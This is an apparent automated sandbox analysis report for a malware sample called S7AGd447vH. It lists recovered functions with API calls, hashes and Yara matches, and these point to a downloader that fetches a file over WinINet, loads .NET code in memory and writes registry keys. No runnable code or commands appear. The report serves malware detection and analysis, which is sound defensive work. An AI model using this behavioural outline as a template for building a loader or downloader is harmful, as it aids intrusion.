                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: a88279e4522e485ab282a0a5c8957451ebbb1a3de6d265956c8fa050cfe0807a
                                                                                  • Instruction ID: 8f76220167ec17abf5339b834285133c125a210c270ad1c1e6088077211f2785
                                                                                  • Opcode Fuzzy Hash: a88279e4522e485ab282a0a5c8957451ebbb1a3de6d265956c8fa050cfe0807a
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 00414597 Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0
                                                                                  • API String ID: 0-4108050209
                                                                                  • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                  • Instruction ID: a79367af4f373e0a92b4b194a9628dae4a71434ef80c9604ceba69f1c4801f13
                                                                                  • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                                                                                  • Instruction Fuzzy Hash: 6F51497060064867DF388A6884957FFA79A9BC330CF18051FE582DB3C1D61DDECA865E
                                                                                  Function 7FE4208F Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: kernel32.dll
                                                                                  • API String ID: 0-1793498882
                                                                                  • Opcode ID: 4feebe76e4882add21e639fbbcfa140da3d33747a649c974eb9a4e06c4b18b09
                                                                                  • Instruction ID: 22572b66b0f59e9ccc71fa9dbd2098e078f8ceb7472a598ea91be516a38dcceb
                                                                                  • Opcode Fuzzy Hash: 4feebe76e4882add21e639fbbcfa140da3d33747a649c974eb9a4e06c4b18b09
                                                                                  • Instruction Fuzzy Hash: D2F03C72601704ABCB20CF89E980966F7F9FB08358B11466EE946E7600E771FD44CAA0
                                                                                  Function 00403360 Relevance: .7, Instructions: 701COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 591565d987f1e778879e702b80887747e2d6f785ace01a18102c9f5e0baa3118
                                                                                  • Instruction ID: 7ab81aa9486b2000a2b0f43c2bb6e6a55a1dd180e2d60bd58bcda0ca25c5da21
                                                                                  • Opcode Fuzzy Hash: 591565d987f1e778879e702b80887747e2d6f785ace01a18102c9f5e0baa3118
                                                                                  • Instruction Fuzzy Hash: 412250B3F515144BDB0CCA5DDCA27EDB2E3AFD8314B0E903DA40AE3345EA79D9158688
                                                                                  Function 004230A7 Relevance: .1, Instructions: 104COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4e041d0d75bd8484d5612abe03b931e0f373b2d9a38179b47e6c84416fcc083f
                                                                                  • Instruction ID: 8f3a4aa7a2b2fef9cac13e98439c781c72b23cdf2e078c21a5a8800550fb86b5
                                                                                  • Opcode Fuzzy Hash: 4e041d0d75bd8484d5612abe03b931e0f373b2d9a38179b47e6c84416fcc083f
                                                                                  • Instruction Fuzzy Hash: 5821B373F204395B7B0CC47E8C562BDB6E1C68C601745823AE8A6EA2C1D96CD917E2E4
                                                                                  Function 00422F87 Relevance: .1, Instructions: 81COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9a698f86bbd397036ddb9beaa940442a224b07e7db434529d0f147d4e5b4c222
                                                                                  • Instruction ID: eb398c664e42cb3bd89a26cffe5c10163ea70f5f5d31fa8843e0afeb5f467b84
                                                                                  • Opcode Fuzzy Hash: 9a698f86bbd397036ddb9beaa940442a224b07e7db434529d0f147d4e5b4c222
                                                                                  • Instruction Fuzzy Hash: E811A723F30C356B675C816D8C1327AA1D6EBD824034F533AD826E73C4E894DE13D290
                                                                                  Function 004252B0 Relevance: .1, Instructions: 76COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction ID: 6d6f27163d5a91045088470029a44917658adf3661b23843a50aa446b2092e7a
                                                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                  • Instruction Fuzzy Hash: 0D115B773009B283D604CA7DF4B45FBA395EBC53607AC53BBD4424B744E2BAE9419D08
                                                                                  Function 7FE4260F Relevance: .1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 36f53da09a597ef46754e68027e02d588dc2b792ea0009f90e6be2a57e41e326
                                                                                  • Instruction ID: 7dba653b3e80d9af872c281314c1e9a53d005ac14964c07f6537dc1932b0c6fc
                                                                                  • Opcode Fuzzy Hash: 36f53da09a597ef46754e68027e02d588dc2b792ea0009f90e6be2a57e41e326
                                                                                  • Instruction Fuzzy Hash: E4112B327501160F970CDA7C88A60B5B7D6D7CC254385957EEC4BCF282D471E913C6D0
                                                                                  Function 00580665 Relevance: .1, Instructions: 71COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704912105.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_580000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 123c6e8ee6dcd482ce5f480a0368d6ebca22ddcfbc4a85e13857beb9e3b8362c
                                                                                  • Instruction ID: b6ec0a18c76abe62825b7707b2276d01cdfebd3e797a8655b8fe7f0a7702bb1a
                                                                                  • Opcode Fuzzy Hash: 123c6e8ee6dcd482ce5f480a0368d6ebca22ddcfbc4a85e13857beb9e3b8362c
                                                                                  • Instruction Fuzzy Hash: F31138327501154F9B5CEA7D8892075BBD5A7CC350385863AEC47DF2C2E471D927C6C0
                                                                                  Function 004169A2 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                                                                  • Instruction ID: 4d5187461e70567e6b15c61b1bec3380518cd04694ed7892919f32605493efa9
                                                                                  • Opcode Fuzzy Hash: 22c8ee549e0e701cc67c10f8b31497336b99bd38d043062465dd4583a8c5f113
                                                                                  • Instruction Fuzzy Hash: 0BE08CB2921228EBCB14DB89C944D8AF3FCEB49B04B12049BB502E3200C274DE44C7D4
                                                                                  Function 00580046 Relevance: .0, Instructions: 2COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704912105.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_580000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                  • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                  • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                  • Instruction Fuzzy Hash:
                                                                                  Function 7FE436D4 Relevance: 25.7, APIs: 17, Instructions: 233memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CoInitializeEx.COMBASE(00000000,00000000), ref: 7FE436E1
                                                                                    • Part of subcall function 7FE43663: LoadLibraryW.KERNEL32(mscoree.dll,00000000,02263E58,00000000,00033400,?,7FE43722,?), ref: 7FE43671
                                                                                  • SafeArrayCreate.OLEAUT32(00000011,00000001,?), ref: 7FE4377B
                                                                                  • memcpy.NTDLL(?,00033400,02263E58), ref: 7FE437AB
                                                                                  • SafeArrayGetLBound.OLEAUT32(7FE42E35,00000001,?), ref: 7FE4381A
                                                                                  • SafeArrayGetUBound.OLEAUT32(7FE42E35,00000001,?), ref: 7FE43831
                                                                                  • GetCommandLineW.KERNEL32(00033400), ref: 7FE43853
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 7FE4385A
                                                                                  • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 7FE4386D
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,00033400), ref: 7FE43881
                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 7FE43894
                                                                                  • SafeArrayPutElement.OLEAUT32(?,02263E58,00000000), ref: 7FE438A2
                                                                                  • SafeArrayCreateVector.OLEAUT32(00000008,00000000,00000001), ref: 7FE438BA
                                                                                  • SysAllocString.OLEAUT32(7FE453F4), ref: 7FE438C4
                                                                                  • SafeArrayPutElement.OLEAUT32(?,02263E58,00000000), ref: 7FE438D2
                                                                                  • SafeArrayDestroy.OLEAUT32(?), ref: 7FE4390E
                                                                                  • SafeArrayDestroy.OLEAUT32(00033400), ref: 7FE43913
                                                                                  • SafeArrayDestroy.OLEAUT32(00000000), ref: 7FE4392B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArraySafe$Create$DestroyVector$AllocBoundCommandElementLineString$ArgvInitializeLibraryLoadmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1402434309-0
                                                                                  • Opcode ID: 5e5e04b494e50c0cdfeba50543377363f6c7516b20a2b1ab4e64372355080cbf
                                                                                  • Instruction ID: fc6f7cf24404cfcf3d7afd4173260bed971fdfda6a4a432beba6904d6f1273b5
                                                                                  • Opcode Fuzzy Hash: 5e5e04b494e50c0cdfeba50543377363f6c7516b20a2b1ab4e64372355080cbf
                                                                                  • Instruction Fuzzy Hash: 49916C75A00209EFDB00DFA5C884AEEBBB9FF48354F104068F90AEB260D731A956DF51
                                                                                  Function 0041D57B Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0041D5BF
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D175
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D187
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D199
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1AB
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1BD
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1CF
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1E1
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D1F3
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D205
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D217
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D229
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D23B
                                                                                    • Part of subcall function 0041D158: _free.LIBCMT ref: 0041D24D
                                                                                  • _free.LIBCMT ref: 0041D5B4
                                                                                    • Part of subcall function 00417051: HeapFree.KERNEL32(00000000,00000000,?,0041614E), ref: 00417067
                                                                                    • Part of subcall function 00417051: GetLastError.KERNEL32(?,?,0041614E), ref: 00417079
                                                                                  • _free.LIBCMT ref: 0041D5D6
                                                                                  • _free.LIBCMT ref: 0041D5EB
                                                                                  • _free.LIBCMT ref: 0041D5F6
                                                                                  • _free.LIBCMT ref: 0041D618
                                                                                  • _free.LIBCMT ref: 0041D62B
                                                                                  • _free.LIBCMT ref: 0041D639
                                                                                  • _free.LIBCMT ref: 0041D644
                                                                                  • _free.LIBCMT ref: 0041D67C
                                                                                  • _free.LIBCMT ref: 0041D683
                                                                                  • _free.LIBCMT ref: 0041D6A0
                                                                                  • _free.LIBCMT ref: 0041D6B8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                  • String ID:
                                                                                  • API String ID: 161543041-0
                                                                                  • Opcode ID: 4a8b5a15acc7a14c50cd063d573e4647b370686c1df12e260f6979065f655518
                                                                                  • Instruction ID: dcef3dbcea8c8cab475391e30086021f64108fb912e19989a36c443812c4af62
                                                                                  • Opcode Fuzzy Hash: 4a8b5a15acc7a14c50cd063d573e4647b370686c1df12e260f6979065f655518
                                                                                  • Instruction Fuzzy Hash: 2E3148B1A04304AFEB31AB6AD845BDB77E9AF45314F10442BF45896291DB39E8C0CA28
                                                                                  Function 7FE434AF Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 87libraryloaderCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,CorBindToRuntime), ref: 7FE434E6
                                                                                  • GetProcAddress.KERNEL32(?,GetCORVersion), ref: 7FE434F1
                                                                                  • GetProcAddress.KERNEL32(?,GetRequestedRuntimeInfo), ref: 7FE434FC
                                                                                  • wcscmp.NTDLL ref: 7FE43525
                                                                                  • wcscmp.NTDLL ref: 7FE43544
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1709617833.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7fe40000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$wcscmp
                                                                                  • String ID: 2$CorBindToRuntime$GetCORVersion$GetRequestedRuntimeInfo$v1.0.3705$v2.0.50727
                                                                                  • API String ID: 983638816-2194063276
                                                                                  • Opcode ID: 851bd8ff7da982f9098ecc1943af40099da2c3e3c62217fab860e5e858954dc2
                                                                                  • Instruction ID: 3e50560d5e1eeb36687fdd8f9e3dcfe970e9a1f44889845de766484beba81e0f
                                                                                  • Opcode Fuzzy Hash: 851bd8ff7da982f9098ecc1943af40099da2c3e3c62217fab860e5e858954dc2
                                                                                  • Instruction Fuzzy Hash: F6210E76D00309BFDF11CFE6DD849EEBBBDAB042A4F10912EB916E6140D774E604AB50
                                                                                  Function 004025D0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(0042DDC8,00000000,00000000,00000000,00000000), ref: 00402671
                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402683
                                                                                  • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 0040269A
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004026AB
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004026AE
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004026BF
                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004026C2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Internet$CloseHandle$Open$FileRead
                                                                                  • String ID: <$PDu$runas
                                                                                  • API String ID: 4294395943-1867505789
                                                                                  • Opcode ID: 8a1466d50c53b960467b206397ced202853f845467a2dd78328e6e7bcede0099
                                                                                  • Instruction ID: 5caa1b4c2bb0475ce066421cd81d484175f7ff2198b5b2135e34d8f39fdfba83
                                                                                  • Opcode Fuzzy Hash: 8a1466d50c53b960467b206397ced202853f845467a2dd78328e6e7bcede0099
                                                                                  • Instruction Fuzzy Hash: 6D411531E00118ABDB18DF64CD88BEFB779EF45300F20846AE511A72D1DB78A941CB98
                                                                                  Function 00406580 Relevance: 16.2, APIs: 8, Strings: 1, Instructions: 401COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (
                                                                                  • API String ID: 0-3887548279
                                                                                  • Opcode ID: cb2713355ae90bfdc193a3310f929ff71c802542f73eb0b160a9236a18cb9809
                                                                                  • Instruction ID: fafec351d86de70b750e45bf8ab9a6e84be13f0c20e646c88c85f987d0f63b27
                                                                                  • Opcode Fuzzy Hash: cb2713355ae90bfdc193a3310f929ff71c802542f73eb0b160a9236a18cb9809
                                                                                  • Instruction Fuzzy Hash: 67F1A270A002189FEF24EF64CD85BDDBBB6AF45304F6041AAE4057B2C2D7795A88CF95
                                                                                  Function 0041782A Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                  • String ID:
                                                                                  • API String ID: 776569668-0
                                                                                  • Opcode ID: 9705148b6d4611f199b29fbf6d503725fc2e82af552bd358df9aa8192e56abba
                                                                                  • Instruction ID: f8251996026b2c657cf6fbbbca1204a4564fd927f6cf5e2d756e948804c447a0
                                                                                  • Opcode Fuzzy Hash: 9705148b6d4611f199b29fbf6d503725fc2e82af552bd358df9aa8192e56abba
                                                                                  • Instruction Fuzzy Hash: 0B219A76904208AFCB41EF95C845DDE7FB9BF08354F01416AF9199B122DB35DAD4CB84
                                                                                  Function 00411490 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004114C7
                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 004114CF
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00411558
                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00411583
                                                                                  • _ValidateLocalCookies.LIBCMT ref: 004115D8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                  • String ID: csm$csm
                                                                                  • API String ID: 1170836740-3733052814
                                                                                  • Opcode ID: 01b438ee1057a57edc1f68f2c86fba3ab44eab7f05e20b71c9ec1a045688145a
                                                                                  • Instruction ID: 352e952380e70f6529a1430d259ef847dd733fe29a9b82d828665c6799f42ab3
                                                                                  • Opcode Fuzzy Hash: 01b438ee1057a57edc1f68f2c86fba3ab44eab7f05e20b71c9ec1a045688145a
                                                                                  • Instruction Fuzzy Hash: 9051D434A00204EFCF14DF29D840ADE7BB6AF44354F14819BEA155B3B2D739D981CB99
                                                                                  Function 0041C993 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _free$___from_strstr_to_strchr
                                                                                  • String ID:
                                                                                  • API String ID: 3409252457-0
                                                                                  • Opcode ID: 5f46d572b778c3697a0c05575639509b3390ca82aab550750eacb09b6088fa6f
                                                                                  • Instruction ID: 9d50c6fd6b57e85d972ac0d25882121bb86adefa59d36aee53cf5b357788dddd
                                                                                  • Opcode Fuzzy Hash: 5f46d572b778c3697a0c05575639509b3390ca82aab550750eacb09b6088fa6f
                                                                                  • Instruction Fuzzy Hash: 615107B1E88315AEDB10AF659CC2BEE7BA4AF01354F00416FE414D7281EB7999C18B9D
                                                                                  Function 00404110 Relevance: 10.9, APIs: 7, Instructions: 370registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,00000001,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00404141
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,00000001,00000000,00000002,80000001), ref: 00404160
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
